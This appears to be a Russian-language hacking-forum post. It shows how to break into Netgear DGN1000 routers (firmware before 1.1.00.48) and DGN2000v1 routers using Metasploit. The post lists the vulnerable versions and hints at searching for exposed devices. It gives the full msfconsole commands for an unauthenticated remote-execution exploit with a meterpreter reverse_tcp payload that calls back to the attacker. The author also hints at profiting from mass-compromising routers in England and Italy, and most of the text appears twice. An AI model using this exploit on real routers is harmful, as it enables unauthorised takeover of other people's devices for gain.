Приветствую Вас, сегодня с утра хочу Вас удивить и даже наверное озадачить или просветить)) Ломать мы будем этот роутер:
Подробнее про него Вы сможете по читать
Я же в свою очередь поведаю какие версии прошивки ломаются, как ломать и как их найти.)
Версии прошивок которые подвержены атаки : Netgear DGN1000 с версиями прошивки до 1.1.00.48 и DGN2000v1
Ну а поиск будет классический)
и ломать их можно с помощью старого добро пишу с большой буквы из-за уважения Метасплойта!))
Вам же понятно какие IP адреса указывать для обратной связи..
Удачи..!) Берегите себя!
П.С. НАМЁК)) а уж какую выгоду можно поиметь взломав роутеры в Англии и Италии ))
Ссылка скрыта от гостей
Я же в свою очередь поведаю какие версии прошивки ломаются, как ломать и как их найти.)
Версии прошивок которые подвержены атаки : Netgear DGN1000 с версиями прошивки до 1.1.00.48 и DGN2000v1
Ну а поиск будет классический)
и ломать их можно с помощью старого добро пишу с большой буквы из-за уважения Метасплойта!))
Код:
msf > use exploit/linux/http/netgear_dgn1000_setup_unauth_execmsf exploit(netgear_dgn1000_setup_unauth_exec) > set RHOST 192.168.0.1
RHOST => 192.168.0.1
msf exploit(netgear_dgn1000_setup_unauth_exec) > set RPORT 80
RPORT => 80
msf exploit(netgear_dgn1000_setup_unauth_exec) > set LHOST eth0
LHOST = eth0
msf exploit(netgear_dgn1000_setup_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
msf exploit(netgear_dgn1000_setup_unauth_exec) > run
Вам же понятно какие IP адреса указывать для обратной связи..
Удачи..!) Берегите себя!
П.С. НАМЁК)) а уж какую выгоду можно поиметь взломав роутеры в Англии и Италии ))